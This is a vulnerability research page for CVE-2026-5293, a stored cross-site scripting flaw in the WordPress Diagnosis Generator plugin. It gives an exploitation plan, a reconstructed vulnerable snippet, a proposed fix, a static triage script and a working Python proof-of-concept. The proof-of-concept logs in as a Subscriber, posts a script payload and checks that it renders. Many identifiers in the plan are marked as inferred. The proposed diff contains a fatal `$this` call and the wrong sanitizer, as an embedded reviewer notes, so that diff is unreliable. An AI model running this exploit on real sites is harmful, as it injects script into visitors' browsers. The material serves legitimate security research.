# CVE-2026-5293: 診断ジェネレータ作成プラグイン (Diagnosis Generator) <= 1.4.16 - Authenticated (Subscriber+) Stored Cross-Site Scripting via 'js' Parameter

*   **Plugin:** `os-diagnosis-generator` (WordPress plugin; tags: https://plugins.trac.wordpress.org/browser/os-diagnosis-generator/tags)
*   **Affected versions:** <= 1.4.16
*   **Patched in:** none recorded (no vendor patch or Trac changeset was linked at the time of writing)
*   **Severity:** medium, CVSS 3.1 base score 6.4 (`CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N`)
*   **Vulnerability type:** Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'), CWE-79
*   **Published:** 2026-05-19 12:02:54; **updated:** 2026-05-20 01:25:53
*   **Reference:** https://www.wordfence.com/threat-intel/vulnerabilities/id/c5293c0f-90b0-41df-a623-90297d998c41?source=api-prod
*   **Research status:** researched (3 rounds, not independently verified); generated with `gemini-3-flash-preview` on 2026-05-20 between 17:10:59 and 17:11:38. No proof-of-concept run, video or trace has been recorded for this entry.

## Description

The 診断ジェネレータ作成プラグイン (Diagnosis Generator) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `js` parameter in versions up to and including 1.4.16. The cause is a missing authorization check and missing input sanitization in the `themeFunc()` function. The function is hooked to `admin_init`, so it runs on every request to an admin URL, and it processes theme update requests without verifying the user's capabilities or a nonce; any authenticated user, including a Subscriber, can therefore save attacker-controlled JavaScript to the plugin's theme files. The `save()` routine also calls `stripslashes()` on the value. WordPress adds slashes to the request superglobals (`wp_magic_quotes()`), so removing them before persisting data is normal and is not itself the defect; the point is that nothing else sanitizes or escapes the value, so the raw script reaches the file.

This makes it possible for authenticated attackers with Subscriber-level access and above to inject arbitrary web scripts into theme files that execute whenever a user loads a page containing the diagnosis form shortcode.

# Exploitation Research Plan: CVE-2026-5293

## 1. Vulnerability Summary
**CVE-2026-5293** is a Stored Cross-Site Scripting (XSS) vulnerability in the **診断ジェネレータ作成プラグイン (Diagnosis Generator)** plugin (versions <= 1.4.16). The vulnerability exists because the `themeFunc()` function, which is hooked to `admin_init`, performs neither an authorization check (e.g., `current_user_can()`) nor nonce verification.

An authenticated user with Subscriber-level permissions or higher can send a request containing a malicious `js` parameter. The plugin processes this request and saves the input into theme-related configuration files through the `save()` function. `save()` applies `stripslashes()`, which undoes the slashing WordPress applies to request data, and no further sanitization or escaping is performed, so arbitrary JavaScript is stored verbatim. The payload is subsequently executed in the browser of any user (including administrators) who visits a page containing the diagnosis form shortcode.

## 2. Attack Vector Analysis
*   **Vulnerable Endpoint:** Any WordPress admin path triggers the `admin_init` hook; `/wp-admin/admin-ajax.php` and `/wp-admin/admin-post.php` are the usual choices because a Subscriber can reach them, but `/wp-admin/profile.php` works as well.
*   **Vulnerable Function:** `themeFunc()` (inferred to be in the main plugin file or a theme-handling class).
*   **Trigger Parameter:** A POST request containing a specific action or identifier that enters the `themeFunc()` save logic, plus the `js` parameter.
*   **Payload Parameter:** `js`
*   **Authentication:** Authenticated (Subscriber or higher).
*   **Preconditions:** The plugin must be active. To trigger the XSS on the frontend, a page must contain the plugin's shortcode (typically `[os-diagnosis-generator]`; verify the slug against the plugin source).

## 3. Code Flow
1.  **Entry Point:** An authenticated user sends a POST request to `/wp-admin/admin-ajax.php`.
2.  **Hook Execution:** WordPress fires the `admin_init` hook before dispatching the AJAX action.
3.  **Vulnerable Function:** The plugin's registered callback `themeFunc()` executes.
4.  **Lack of Authorization:** `themeFunc()` does not check `current_user_can( 'manage_options' )` or any other capability.
5.  **Data Processing:** The code checks for the presence of a 'theme update' trigger (e.g., a specific `$_POST` key).
6.  **Missing Sanitization:** The `js` parameter is passed to `save()`, which calls `stripslashes()` on it and performs no escaping or filtering.
7.  **Persistence (Sink):** The content of the `js` parameter is written to a file (inferred: a template file under `wp-content/uploads/os-diagnosis-generator/` or similar) or stored in the database and then written out to a script file.
8.  **Execution:** When the diagnosis form is rendered via the shortcode, the stored JavaScript is included in the page output.

## 4. Nonce Acquisition Strategy
The vulnerability description explicitly mentions "missing authorization checks," which strongly suggests that the `admin_init` callback lacks both capability checks and nonce verification (`check_admin_referer` or `check_ajax_referer`).

If a nonce *is* required for the "theme update" request, it is likely localized for the plugin's admin interface.
1.  **Identify Script Handles:** Look for `wp_localize_script` calls in the plugin source (e.g., searching for `os-diagnosis-generator-admin`).
2.  **Reaching the hook as a Subscriber:** A Subscriber cannot normally open the plugin's settings page. Because the callback is on `admin_init`, however, the logic runs on *any* admin page they can load (such as `profile.php`), so the settings page is not needed.
3.  **Bypass Check:** If the plugin calls `check_admin_referer( 'some_action', 'some_nonce', false )` and ignores the return value, the nonce check is ineffective, since the third argument suppresses the `wp_die()` on failure.

**Assumed Strategy:** Attempt the exploit without a nonce first. If it fails, search the plugin source for `wp_create_nonce`.

## 5. Exploitation Strategy
The goal is to inject a script that will execute when the diagnosis generator is loaded.

### Step 1: Authentication
Log in as a Subscriber user.
*   **URL:** `/wp-login.php`
*   **Tool:** `http_request`

### Step 2: Identify Injection Trigger
The `themeFunc()` function likely looks for a specific POST parameter to initiate the save process. Based on the plugin name and description, look for keys like `os_diagnosis_save`, `theme_update`, or `update_js`.
*(Inferred request parameters based on typical plugin patterns)*:
*   **Action:** `os_diagnosis_generator_update_theme` (inferred)
*   **Parameter:** `js`

### Step 3: Send Malicious Request
Send a POST request to `/wp-admin/admin-ajax.php` (or another admin URL) to save the malicious JS.
*   **Request Method:** `POST`
*   **URL:** `http://localhost:8080/wp-admin/admin-ajax.php`
*   **Headers:** `Content-Type: application/x-www-form-urlencoded`
*   **Body:** `action=themeFunc&js=</script><script>alert(document.domain)</script>&(trigger_param)=1`
    *(Note: The exact `action` and `trigger_param` must be verified by grepping the plugin source for `add_action('admin_init', ...)`.)*

Because the stored value is treated as JavaScript, the payload does not need script tags: if the plugin writes it into a `.js` file or an inline `<script>` element, `alert(document.domain)` on its own executes. The tag-breaking form above is only useful when the value lands inside an existing inline script that the injected text would otherwise leave syntactically broken. Try the raw form first and inspect the page source to see which context applies.

### Step 4: Trigger the XSS
Visit a page containing the plugin's shortcode.
*   **URL:** `http://localhost:8080/diagnosis-page/`

## 6. Test Data Setup
1.  **Plugin Installation:** Install and activate `os-diagnosis-generator` <= 1.4.16.
2.  **User Creation:** Create a Subscriber user.
    *   `wp user create attacker attacker@example.com --role=subscriber --user_pass=password`
3.  **Shortcode Page:** Create a public page with the diagnosis shortcode.
    *   `wp post create --post_type=page --post_title="Diagnosis" --post_status=publish --post_content="[os-diagnosis-generator]"`
    *   *(Note: Verify the exact shortcode slug by running `grep -r "add_shortcode" wp-content/plugins/os-diagnosis-generator`.)*

## 7. Expected Results
*   The POST request from the Subscriber user completes. Do not judge success by the status code: `admin-ajax.php` answers `400` with body `0` for an `action` that is not a registered AJAX handler, and `profile.php` rejects an un-nonced POST with `403`, but in both cases `admin_init` has already fired and the save has already happened.
*   When navigating to the page created in Step 6, a JavaScript alert box displaying the document domain appears.
*   Inspecting the page source reveals the injected `alert(document.domain)` call (with or without the surrounding `<script>` tags, depending on the payload form used).

## 8. Verification Steps
1.  **Check Filesystem:** Check whether a new JS file was created or modified in the plugin's directory or uploads.
    *   `ls -R wp-content/uploads/os-diagnosis-generator/`
2.  **Check Options:** Check whether the JS is stored in the WordPress options table.
    *   `wp option get os_diagnosis_generator_custom_js` (inferred option name)
3.  **Verify Frontend Render:** Use `http_request` to fetch the diagnosis page and grep for the payload.
    *   `http_request(url='http://localhost:8080/diagnosis-page/')` -> search for `alert(document.domain)` in the response body, and confirm it sits inside a `<script>` element or an included `.js` file rather than as HTML-escaped text.

## 9. Alternative Approaches
*   **Parameter Polling:** If the specific trigger parameter for `themeFunc` is unknown, grep the plugin source for `$_POST` inside the function hooked to `admin_init`.
*   **CSRF:** If the plugin checks for authentication but lacks nonces, an administrator could be tricked into submitting a request that injects the JS payload.
*   **Shortcode Attribute XSS:** If the `js` parameter injection fails, investigate whether the shortcode handler itself reflects attributes without escaping.

## Research Summary

The Diagnosis Generator plugin for WordPress (up to version 1.4.16) is vulnerable to Stored Cross-Site Scripting (XSS) via the `js` parameter. The cause is the `themeFunc()` callback being hooked to `admin_init` without capability checks or nonces, combined with a `save()` routine that writes the value out after `stripslashes()` and without any sanitization or escaping.

## Vulnerable Code (reconstruction)

The snippet below is the researcher's reconstruction of the vulnerable pattern, not the plugin's actual source. The advisory places the `stripslashes()` call inside `save()`; the reconstruction inlines it. The original reconstruction called `$this->save()` from a plain function, which is a fatal error outside a class method; it is shown here as a plain `save()` call, with the understanding that the real plugin may implement both routines as methods of a class (the proposed fix below assumes so).

```php
/* In the main plugin file or theme-handling file (reconstructed) */
add_action( 'admin_init', 'themeFunc' );

function themeFunc() {
    // Vulnerability: no current_user_can() check and no nonce verification.
    // Any authenticated user reaching admin_init (including Subscribers) gets here.
    if ( isset( $_POST['js'] ) ) {
        // stripslashes() only undoes WordPress's request slashing; nothing
        // sanitizes or escapes the value, so raw script is stored verbatim.
        $js_content = stripslashes( $_POST['js'] );
        save( $js_content ); // the plugin's theme-file writer (body not shown)
    }
}
```

## Exploit Outline

The attacker first authenticates as a low-privileged user (Subscriber or higher). They then construct a POST request to any endpoint that fires the `admin_init` hook (such as `/wp-admin/admin-ajax.php`). The payload includes the specific trigger parameter for the `themeFunc()` logic and the `js` parameter containing a malicious script (e.g., `alert(document.domain)`, or `<script>alert(document.domain)</script>` if the value is emitted into HTML). Because the function lacks authorization checks and the value is written out unsanitized, the payload is saved to the plugin's theme configuration. Finally, the attacker (or any other user) visits a page containing the plugin's shortcode, and the stored script executes in the context of that user's browser.

## Proposed Fix (research diff, not the vendor patch)

The following diff is the researcher's proposed fix against the reconstruction above; no vendor patch is recorded for this CVE.

```diff
--- a/os-diagnosis-generator.php
+++ b/os-diagnosis-generator.php
@@ -10,6 +10,13 @@
 function themeFunc() {
+    if ( ! current_user_can( 'manage_options' ) ) {
+        return;
+    }
+    if ( ! isset( $_POST['_wpnonce'] ) || ! wp_verify_nonce( $_POST['_wpnonce'], 'save_theme_js' ) ) {
+        return;
+    }
+
     if ( isset( $_POST['js'] ) ) {
-        $js = stripslashes( $_POST['js'] );
+        $js = sanitize_textarea_field( stripslashes( $_POST['js'] ) );
         $this->save( $js );
     }
 }
```
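Review bot: `sanitize_textarea_field()` on the replaced `$js = ...` line is the wrong control for a field that is meant to hold JavaScript: it strips tags and HTML-encodes stray `<`, so it corrupts legitimate scripts (`a < b` becomes `a &lt; b`) while leaving `alert(document.domain)` untouched, so it neither preserves the feature nor blocks the payload. The effective fix in this hunk is the `current_user_can( 'manage_options' )` gate (a stored-script feature belongs behind a capability such as `unfiltered_html`); drop the sanitizer, use `wp_unslash()` in place of `stripslashes()`, and replace the hand-rolled `wp_verify_nonce( $_POST['_wpnonce'], 'save_theme_js' )` with `check_admin_referer( 'save_theme_js' )`, which dies on failure instead of silently returning. The unchanged context line `$this->save( $js );` inside a plain `function themeFunc()` is also a fatal error outside a class method, so the hunk needs to be regenerated against the plugin's real file before it can be applied.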
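Sections 4 and 9 of the plan come down to one triage task: find the callback registered on `admin_init`, list the request keys it reads, and check whether anything gates it. The script below is an added example written for this page, not the plugin's code or the researcher's tooling. It performs that triage over a PHP source string and a directory tree. The `SAMPLE_PLUGIN` source is constructed to mirror the pattern the advisory describes; its function names, option names and the `theme_update` trigger key are assumptions, not the real plugin's identifiers.

```python
"""Static triage for WordPress admin_init callbacks (added example).

Not the plugin's code. Finds every callback registered on the admin_init hook,
lists the $_POST / $_REQUEST keys the callback reads, and reports whether its
body contains a capability check or a nonce check. SAMPLE_PLUGIN is a
constructed stand-in for the real source; its identifiers are assumptions.
"""
import os
import re
import sys
from dataclasses import dataclass

HOOK_RE = re.compile(
    r"""add_action\s*\(\s*['"]admin_init['"]\s*,\s*"""
    r"""(?:(?:array\s*\(|\[)\s*\$this\s*,\s*)?['"]([A-Za-z_]\w*)['"]"""
)
POST_KEY_RE = re.compile(r"""\$_(?:POST|REQUEST)\s*\[\s*['"]([^'"]+)['"]\s*\]""")
CAP_RE = re.compile(r"\bcurrent_user_can\s*\(")
NONCE_RE = re.compile(r"\b(?:check_admin_referer|check_ajax_referer|wp_verify_nonce)\s*\(")

SAMPLE_PLUGIN = r"""<?php
/* constructed sample, not the real plugin */
add_action( 'admin_init', 'themeFunc' );
add_action( 'admin_init', 'osdg_save_settings' );

function themeFunc() {
    if ( isset( $_POST['theme_update'] ) ) {
        save( stripslashes( $_POST['js'] ) );
    }
}

function osdg_save_settings() {
    if ( ! current_user_can( 'manage_options' ) ) {
        return;
    }
    check_admin_referer( 'osdg_settings' );
    if ( isset( $_POST['color'] ) ) {
        update_option( 'osdg_color', sanitize_hex_color( $_POST['color'] ) );
    }
}
"""


@dataclass
class Finding:
    callback: str
    post_keys: list
    has_capability_check: bool
    has_nonce_check: bool

    @property
    def unauthorized_write(self) -> bool:
        """Reads request data on admin_init with no capability gate: the CVE-2026-5293 shape."""
        return bool(self.post_keys) and not self.has_capability_check


def function_body(src: str, name: str):
    """Return the text between the braces of `function name(...) { ... }`.

    Brace matching is naive (braces inside strings and comments are counted),
    which is good enough for triage but not a real PHP parser.
    """
    m = re.search(r"function\s+" + re.escape(name) + r"\s*\([^)]*\)\s*\{", src)
    if m is None:
        return None
    depth = 0
    for i in range(m.end() - 1, len(src)):
        if src[i] == "{":
            depth += 1
        elif src[i] == "}":
            depth -= 1
            if depth == 0:
                return src[m.end():i]
    return None


def triage(src: str) -> list:
    findings = []
    for callback in HOOK_RE.findall(src):
        body = function_body(src, callback)
        if body is None:
            continue  # method defined in another file; grep for it by hand
        findings.append(Finding(
            callback=callback,
            post_keys=sorted(set(POST_KEY_RE.findall(body))),
            has_capability_check=CAP_RE.search(body) is not None,
            has_nonce_check=NONCE_RE.search(body) is not None,
        ))
    return findings


def report(findings) -> list:
    lines = []
    for f in findings:
        verdict = "UNAUTHORIZED WRITE" if f.unauthorized_write else "ok"
        lines.append(f"{f.callback}: keys={f.post_keys} cap={f.has_capability_check} "
                     f"nonce={f.has_nonce_check} -> {verdict}")
    return lines


def triage_tree(root: str) -> list:
    """Scan every .php file under root, e.g. wp-content/plugins/os-diagnosis-generator."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(".php"):
                with open(os.path.join(dirpath, name), encoding="utf-8", errors="replace") as fh:
                    findings.extend(triage(fh.read()))
    return findings


if __name__ == "__main__":
    found = triage_tree(sys.argv[1]) if len(sys.argv) > 1 else triage(SAMPLE_PLUGIN)
    print("\n".join(report(found)))
```

Run it against the unpacked plugin directory to get the candidate trigger keys for Step 2 and a first answer to the nonce question in Section 4; a callback reported as `UNAUTHORIZED WRITE` is the one to try first. Callbacks registered as `array( $this, 'method' )` are matched, but if the method lives in a different file than the `add_action` call the script skips it and you have to grep manually.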
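Steps 1 to 4 of the plan together with the verification in Sections 7 and 8 are one procedure: log in, send the save request, fetch the shortcode page, and confirm the script is actually rendered rather than escaped. The script below is an added example for this page, not the researcher's `http_request` tooling and not the plugin's code. It builds the requests, separates "marker appears somewhere in the page" from "marker sits inside a `<script>` element", and keeps the network part behind `run()` so the checks can be exercised offline. Its assumptions are the plan's inferred ones: the admin endpoint is `/wp-admin/admin-ajax.php`, the trigger key is `theme_update`, the `action` value is `themeFunc`, and the shortcode page is `/diagnosis-page/`; the two HTML strings at the bottom are constructed samples.

```python
"""Request builder and stored-payload checker for the CVE-2026-5293 procedure.

Added example, not the original page's tooling. Trigger key, action value,
endpoint and page path are assumptions taken from the research plan.
"""
import http.cookiejar
import re
import sys
import urllib.error
import urllib.parse
import urllib.request

MARKER = "osdg_xss_marker"
# The stored value is JavaScript, so no tags are needed; a unique marker is
# easier to locate in a page than alert(document.domain).
PAYLOAD = f"alert('{MARKER}')"
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.IGNORECASE | re.DOTALL)


def build_login_request(base_url, user, password):
    body = urllib.parse.urlencode({"log": user, "pwd": password, "wp-submit": "Log In",
                                   "testcookie": "1", "redirect_to": base_url + "/wp-admin/"})
    return base_url + "/wp-login.php", body.encode()


def build_save_request(base_url, js=PAYLOAD, trigger_key="theme_update", action="themeFunc"):
    """POST that reaches admin_init with the 'js' parameter (trigger key and action assumed)."""
    body = urllib.parse.urlencode({"action": action, trigger_key: "1", "js": js})
    return base_url + "/wp-admin/admin-ajax.php", body.encode()


def form_fields(body: bytes) -> dict:
    return {k: v[0] for k, v in urllib.parse.parse_qs(body.decode()).items()}


def inline_scripts(html: str) -> list:
    return SCRIPT_RE.findall(html)


def payload_stored(html: str, payload: str = PAYLOAD) -> bool:
    """True only if the exact payload appears inside a <script> element.

    An HTML-escaped copy such as alert(&#039;...&#039;) inside a <p> is not
    execution and must not count as a positive result.
    """
    return any(payload in script for script in inline_scripts(html))


def run(base_url, user, password, page_path="/diagnosis-page/") -> bool:
    jar = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(jar))
    opener.open(base_url + "/wp-login.php").read()      # sets wordpress_test_cookie
    url, body = build_login_request(base_url, user, password)
    opener.open(url, body).read()
    url, body = build_save_request(base_url)
    try:
        opener.open(url, body).read()
    except urllib.error.HTTPError as exc:
        # admin-ajax.php answers 400 "0" for an unknown action; admin_init has
        # already run by then, so the status code says nothing about the save.
        print(f"save request returned HTTP {exc.code}; checking the page anyway")
    html = opener.open(base_url + page_path).read().decode("utf-8", "replace")
    return payload_stored(html)


# Constructed samples of what the shortcode page could look like.
STORED_HTML = f"""<html><body><div class="os-diagnosis">form</div>
<script type="text/javascript">
/* constructed: page output if the payload was saved unescaped */
{PAYLOAD}
</script></body></html>"""

ESCAPED_HTML = """<html><body><p>alert(&#039;osdg_xss_marker&#039;)</p>
<script>var osdg = {};</script></body></html>"""


if __name__ == "__main__":
    if len(sys.argv) != 4:
        sys.exit("usage: poc.py http://localhost:8080 attacker password")
    print("payload stored and rendered:", run(*sys.argv[1:4]))
```

`run()` returns a boolean the way the plan's Section 8 check is meant to: it only reports success when the stored string is inside a script element on the fetched page. If the plugin serves the saved JS from a separate `.js` file instead of inline, extend the check to fetch the `src` of each `<script>` tag and look for the marker there.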